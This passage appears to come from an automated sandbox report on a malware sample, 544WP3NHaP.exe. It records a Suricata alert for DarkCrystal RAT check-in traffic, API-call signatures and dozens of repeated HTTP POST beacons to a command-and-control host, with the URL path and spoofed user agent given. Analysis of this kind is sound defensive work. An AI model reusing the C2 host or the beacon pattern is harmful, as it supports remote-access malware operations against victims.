                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008AA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_008AA69B
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_008BC220

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 172.67.220.198:80
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 155636Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1060Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1064Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
